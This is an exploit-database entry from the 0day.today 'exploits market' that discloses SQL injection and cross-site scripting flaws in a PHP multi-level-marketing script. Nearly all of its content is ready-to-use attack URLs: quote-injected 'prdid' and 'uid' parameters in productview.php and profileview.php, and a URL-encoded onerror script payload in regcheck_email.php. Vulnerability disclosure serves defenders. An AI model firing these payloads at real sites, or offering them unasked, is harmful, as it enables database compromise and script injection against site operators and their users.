[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MLM (Multi Level Marketing) Script - Multiple Vulnerabilities

Author
3spi0n
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21014
Category
web applications
Date add
22-07-2013
Platform
php
[1] SQL Injection Vulnerabilities on Demo Site
 
[+] (productview.php, prdid Param)
>>> http://server/product/version2/productview.php?prdid='1
 
[+] (productview.php, uid param)
>>> http://server/product/version2/profileview.php?uid='1
 
[2] Xss (Cross Site Scripting) Vulnerability on Demo Site
 
[+] (regcheck_email.php, email param)
>>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E

#  0day.today [2024-09-28]  #